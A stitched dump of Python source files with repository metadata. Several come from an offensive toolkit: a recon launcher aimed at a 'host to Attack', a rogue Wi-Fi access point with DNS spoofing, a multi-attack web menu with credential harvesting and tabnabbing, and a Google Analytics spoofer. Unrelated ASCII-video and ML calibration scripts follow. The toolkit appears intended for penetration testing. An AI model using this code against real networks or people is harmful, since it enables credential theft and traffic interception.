print(bcolors.BLUE + bcolors.BOLD + "\n[+] WhatWeb Scanner has begun to find running technology .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("whatweb -a 3 -v {0}".format(host), shell = True).wait()
return process
def nuclei(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nuclei Scanner has begun Vulnerbility Scanning .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("nuclei -target {0}".format(host), shell = True).wait()
return process
def nikto(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nikto Scanner has started Vulnerbility Scanning .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("nikto -C all -host {0}".format(host), shell = True).wait()
return process
def ferox(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] FeroxBuster Scanner has started Discovering host internal files .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("feroxbuster --url http://{0}".format(host), shell = True).wait()
return process
class Options():
def menu(self):
print(bcolors.BLUE + bcolors.BOLD +"""
[---] Choose what to do from the menu below [---]"""+ bcolors.ENDC)
print(bcolors.BLUE + """
1) Port Scanning 5) Start Nikto Scaning
2) Dns Reconning 6) Fero File Searching
3) Web Technologies 7) Automation Scanning
4) Nuclei Vuln Scanning 8) Exit Africana Tool."""+ bcolors.ENDC)
os.system('clear')
shamura = main()
shamura.intro_banner()
host = input(bcolors.RED + bcolors.BOLD + "\n\n[+] What is your host to Attack:?... ~$ "+ bcolors.ENDC)
os.system('clear')
spiders = scanners(host = '')
def select():
optio = Options()
optio.menu()
choice = input(bcolors.RED + bcolors.BOLD + "\n[+] What is Your Choice from the above table ?: " + bcolors.ENDC)
while True:
try:
if choice == '1':
os.system('clear')
return spiders.nmap(host), select()
elif choice == '2':
os.system('clear')
return spiders.dnsrec(host), select()
elif choice == '3':
os.system('clear')
return spiders.whatweb(host), select()
elif choice == '4':
os.system('clear')
return spiders.nuclei(host), select()
elif choice == '5':
os.system('clear')
return spiders.nikto(host), select()
elif choice == '6':
os.system('clear')
return spiders.ferox(host), select()
elif choice == '7':
os.system('clear')
return spiders.nmap(host), spiders.dnsrec(host), spiders.whatweb(host), spiders.nuclei(host), spiders.nikto(host), spiders.ferox(host), select()
elif choice == '8':
os.system('clear')
print(bcolors.RED + bcolors.BOLD + "\n[-] Exiting The Engine Bye and Get Saved if Not .." + bcolors.ENDC)
shamura.closser_banner()
break
else:
print(bcolors.RED + bcolors.BOLD + "\n[-] Critical Error has happened" + bcolors.ENDC)
break
except:
print(bcolors.RED + bcolors.BOLD + "\n[-] Critical Error has happened" + bcolors.ENDC)
break
select()
if __name__ == '__main__':
main()
| 8,834 | Python | .py | 236 | 27.330508 | 161 | 0.495391 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,862 | wifiattack.py | CHEGEBB_africana-framework/externals/set/src/wireless/wifiattack.py | #!/usr/bin/env python3
# coding=utf-8
##############################################
#
# This is a basic setup for an access point
# attack vector in set.
#
##############################################
import sys
import os
import subprocess
import pexpect
import time
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
try: input = raw_input
except NameError: pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option domain-name-servers 8.8.8.8;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.100 192.168.10.254;
option domain-name-servers 8.8.8.8;
option routers 192.168.10.1;
option broadcast-address 192.168.10.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2)
dhcptun = 2
if fakeap_dhcp_menu_choice == "exit":
core.exit_set()
interface = input(core.setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
core.print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "/usr/local/sbin/airmon-ng"
else:
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("{0} start {1} |"
"grep \"monitor mode enabled on\" |"
"cut -d\" \" -f5 |"
"sed -e \'s/)$//\'".format(airmonng_path, interface),
shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
# execute modprobe tun
subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
core.print_status("Spawning airbase-ng in a separate child thread...")
child = pexpect.spawn('{0} -P -C 20 -e "{1}" -c {2} {3}'.format(airbase_path, access_point, ap_channel, moniface))
core.print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun == 1:
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun == 2:
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
core.print_status("Starting the DHCP server on a separate child thread...")
child2 = pexpect.spawn("service isc-dhcp-server start")
# starts ip_forwarding
core.print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof
core.print_status("Starting DNSSpoof in a separate child thread...")
child4 = pexpect.spawn("{0} -i at0".format(dnsspoof_path))
core.print_status("SET has finished creating the attack. If you experienced issues please report them.")
core.print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
core.print_status("Be sure to come back to this menu to stop the services once your finished.")
core.return_continue()
| 6,339 | Python | .tac | 141 | 41.503546 | 125 | 0.709819 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,863 | stop_wifiattack.py | CHEGEBB_africana-framework/externals/set/src/wireless/stop_wifiattack.py | #!/usr/bin/env python3
# coding=utf-8
import subprocess
import src.core.setcore as core
#
# Simple python script to kill things created by the SET wifi attack vector
#
try: input = raw_input
except NameError: pass
interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
"rfkill block all;"
"rfkill unblock all;"
"modprobe rtl8187;"
"rfkill unblock all;"
"ifconfig {0} up".format(interface),
shell=True).wait()
core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
core.print_status("Turning off IP_forwarding...")
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()
core.print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()
core.print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()
core.print_status("SET has stopped the wireless access point. ")
core.return_continue()
| 1,549 | Python | .tac | 34 | 41.205882 | 101 | 0.713906 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,864 | multiattack.py | CHEGEBB_africana-framework/externals/set/src/webattack/multi_attack/multiattack.py | #!/usr/bin/env python3
import re
import sys
import os
import subprocess
import time
import signal
# Grab the central imports
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
operating_system = check_os()
me = mod_name()
#######################################################
# Heres the brains behind the multiattack vector.
# This preps each check and payload for each attack
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename, results):
filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger = ""
# set toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a = 1
print ("""
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 0. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
try: # this will trigger an error if it isnt an integer
profile = int(profile)
# convert it back
profile = str(profile)
# if it triggers an exception reassign profile to option 8
except:
profile = "10"
# if you want to return to main menu
if profile == "0":
break
# trigger invalid option
if int(profile) >= 10:
input("\nInvalid option..")
return_continue()
if profile == "6":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC)
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet = "off"
# toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack = "off"
# toggle flags here
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester = "off"
# toggle flags here
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking = "on"
return_menu()
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking = "off"
# toggle flags here
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(userconfigpath + "webdav_enabled"):
webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag = "on"
a = subprocess.Popen(
"python3 src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a = subprocess.Popen("python3 src/mlitm/mlitm.py")
else:
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
module_reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
| 13,603 | Python | .tac | 349 | 30.30659 | 115 | 0.569458 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,865 | google_analytics_attack.py | CHEGEBB_africana-framework/externals/set/modules/google_analytics_attack.py | #!/usr/bin/env python3
from __future__ import print_function
print("Loading module. Please wait...")
import src.core.setcore
import sys
import requests
import re
import time
import random
try:
input = raw_input
except NameError:
pass
MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"
### MAIN ###
def main():
print_title()
# determins if auto or manual, then calls functions
mode_choice = input("[*] Choose mode (automatic/manual): ")
if mode_choice in ("automatic","auto"):
print("\n[*] Entering automatic mode.\n")
url = input("[*] Target website (E.g. 'http://xyz.com/'): ")
params = auto_params(url)
elif mode_choice in ("manual","man"):
print("\n[*] Entering manual mode.")
params = manual_params()
else:
print("\n[-] Invalid mode.\n")
sys.exit()
# params have been collected, prompts for print
print("\n[+] Payload ready.")
printchoice = input("\n[*] Print payload?(y/n): ")
if printchoice == "y":
print_params(params)
#sends request
input("\nPress <enter> to send payload.")
send_spoof(params)
#prompts for loop, calls function if need be
loopchoice = input("\n[*] Send payload on loop?(y/n) ")
if loopchoice == "y":
looper(params)
input("\n\nThis module has finished completing. Press <enter> to continue")
### print_params - loops through params and prints
def print_params(params):
print()
for entry in params:
print(entry + " = " + params[entry])
### looper - prompts for seconds to sleep, starts loop
def looper(params):
secs = input("[*] Seconds between payload sends: ")
input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
while True:
send_spoof(params)
time.sleep(int(secs))
### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
params['cid'] = random.randint(100,999)
r = requests.get('https://www.google-analytics.com/collect', params=params)
print("\n[+] Payload sent.")
print(r.url)
### auto_params - makes request to target site, regexes for params
def auto_params(url):
try: #parses URL for host and page
m = re.search('(https?:\/\/(.*?))\/(.*)',url)
host = str(m.group(1))
page = "/" + str(m.group(3))
except:
print("\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n")
sys.exit()
try: #makes request to target page
r = requests.get(url)
except:
print("\n[-] Unable to reach target website for parsing.\n")
sys.exit()
try: #parses target webpage for title
m = re.search('<title>(.*)<\/title>', r.text)
page_title = str(m.group(1))
except:
print("\n[-] Unable to parse target page for title.\n")
sys.exit()
try: #parses target webpage for tracking id
m = re.search("'(UA-(.*))',", r.text)
tid = str(m.group(1))
except:
print("\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n")
sys.exit()
#builds params dict
params = {}
params['v'] = "1"
params['tid'] = tid
params['cid'] = "555"
params['t'] = "pageview"
params['dh'] = host
params['dp'] = page
params['dt'] = page_title
params['aip'] = "1"
params['dr'] = input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
return params
### manual_params - prompts for all params
def manual_params():
params = {}
params['v'] = "1"
params['tid'] = input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
params['cid'] = "555"
params['t'] = "pageview"
params['aip'] = "1"
params['dh'] = input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
params['dp'] = input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
params['dt'] = input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
params['dr'] = input("[*] Enter referal page to spoof (dr): ")
return params
### print_title - prints title and references
def print_title():
print("\n----------------------------------")
print(" Google Analytics Attack ")
print(" By Tyler Rosonke (@ZonkSec) ")
print("----------------------------------\n")
print("User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n")
print("References:")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference")
print("-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n")
| 4,675 | Python | .tac | 122 | 33.196721 | 108 | 0.612726 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,866 | play.py | buckley310_bad-apple-fs/play.py | import sys
import time
import json
import zlib
from fuse import FUSE, Operations
class Play(Operations):
def __init__(self):
self.fps = 29.97
with open("frames.dat", "rb") as f:
self.frames = json.loads(zlib.decompress(f.read()))
def readdir(self, path, _):
yield "."
yield ".."
if path == "/":
start = time.time()
flen = len(self.frames)
wid = len(self.frames[0][0])
for i in range(flen):
yield " ".join(
[
str(int((i / self.fps + start) * 1000)),
str(i).rjust(4, "0"),
" " * 8,
f"[{('='*int(wid*(i+1)/flen)).ljust(wid)}]",
]
)
else:
target = int(path.split("/")[1].split(" ")[0]) / 1000
delay = target - time.time()
if delay > 0:
time.sleep(delay)
fnum = int(path.split("/")[1].split(" ")[1])
for i in range(len(self.frames[fnum])):
yield str(i).rjust(2, "0") + " \u2502" + self.frames[fnum][i] + "\u2502"
def getattr(self, path, _=None):
m = time.timezone
try:
m += int(path.split("/")[1].split(" ")[1]) / self.fps
except IndexError:
pass
return {
"st_atime": 0,
"st_ctime": 0,
"st_gid": 0,
"st_mode": 0x8000 if path.count("/") > 1 else 0x4000,
"st_mtime": m,
"st_nlink": 1,
"st_size": 0,
"st_uid": 0,
}
FUSE(Play(), sys.argv[1])
| 1,681 | Python | .py | 51 | 21.215686 | 88 | 0.424168 | buckley310/bad-apple-fs | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,867 | gen.py | buckley310_bad-apple-fs/gen.py | import cv2
import json
import zlib
def read_video():
i = 1
v = cv2.VideoCapture("video.webm")
while (frame := v.read())[0]:
print("processing frame:", i, "/", v.get(cv2.CAP_PROP_FRAME_COUNT))
yield frame[1]
i += 1
def main():
scale = 8
subpixels = (
(1 * scale, 3 * scale),
(0 * scale, 3 * scale),
(1 * scale, 2 * scale),
(1 * scale, 1 * scale),
(1 * scale, 0 * scale),
(0 * scale, 2 * scale),
(0 * scale, 1 * scale),
(0 * scale, 0 * scale),
)
frames = []
for img in read_video():
frame = []
for y in range(len(img) // (4 * scale)):
ln = ""
for x in range(len(img[0]) // (2 * scale)):
outi = 0
for xa, ya in subpixels:
outi <<= 1
outi += img[y * 4 * scale + ya][x * 2 * scale + xa][0] > 127
ln += chr(0x2800 + outi)
frame.append(ln)
frames.append(frame)
print("\n".join(frame))
with open("frames.dat", "wb") as f:
f.write(zlib.compress(json.dumps(frames).encode("ascii")))
main()
| 1,177 | Python | .py | 39 | 21.564103 | 80 | 0.464128 | buckley310/bad-apple-fs | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,868 | setup.py | cvlab-yonsei_RankMixup/setup.py | from setuptools import setup, find_packages
setup(
name="calibrate",
version="0.1",
packages=find_packages(),
python_requries=">=3.8",
install_requires=[
"torch==1.8.1",
"torchvision>=0.8.2",
"ipdb==0.13.9",
"albumentations==1.1.0",
"opencv-python==4.5.1.48",
"hydra-core==1.1.2",
"flake8==4.0.1",
"wandb==0.12.14",
"terminaltables==3.1.10",
"matplotlib==3.5.1",
"plotly==5.7.0",
"pandas==1.4.2"
],
)
| 522 | Python | .py | 21 | 18.095238 | 43 | 0.518 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,869 | test_net.py | cvlab-yonsei_RankMixup/tools/test_net.py | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Tester, OODTester
from calibrate.utils import set_random_seed
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester,
"ood": OODTester,
}
@hydra.main(config_path="../configs", config_name="defaults")
def main(cfg: DictConfig):
logger.info("Launch command : ")
logger.info(" ".join(sys.argv))
with open_dict(cfg):
cfg.work_dir = os.getcwd()
logger.info("\n" + OmegaConf.to_yaml(cfg))
set_random_seed(
cfg.seed if cfg.seed is not None else None,
deterministic=True if cfg.seed is not None else False
)
tester = TESTER[cfg.task](cfg)
tester.run()
logger.info("Job complete !\n")
if __name__ == "__main__":
main()
| 862 | Python | .py | 29 | 25.896552 | 61 | 0.693803 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,870 | train_net.py | cvlab-yonsei_RankMixup/tools/train_net.py | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Trainer, SegmentTrainer, NLPTrainer
from calibrate.utils import set_random_seed
logger = logging.getLogger(__name__)
TRAINERS = {
"cv": Trainer,
"segment": SegmentTrainer,
"nlp": NLPTrainer,
}
@hydra.main(config_path="../configs", config_name="defaults")
def main(cfg: DictConfig):
logger.info("Launch command : ")
logger.info(" ".join(sys.argv))
with open_dict(cfg):
cfg.work_dir = os.getcwd()
logger.info("\n" + OmegaConf.to_yaml(cfg))
set_random_seed(
cfg.seed if cfg.seed is not None else None,
deterministic=True if cfg.seed is not None else False
)
trainer = TRAINERS[cfg.task](cfg)
trainer.run()
logger.info("Job complete !\n")
if __name__ == "__main__":
main()
| 919 | Python | .py | 30 | 26.766667 | 64 | 0.700796 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,871 | newsgroup.py | cvlab-yonsei_RankMixup/calibrate/data/newsgroup.py | import os
import os.path as osp
import sys
import numpy as np
import torch
import logging
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
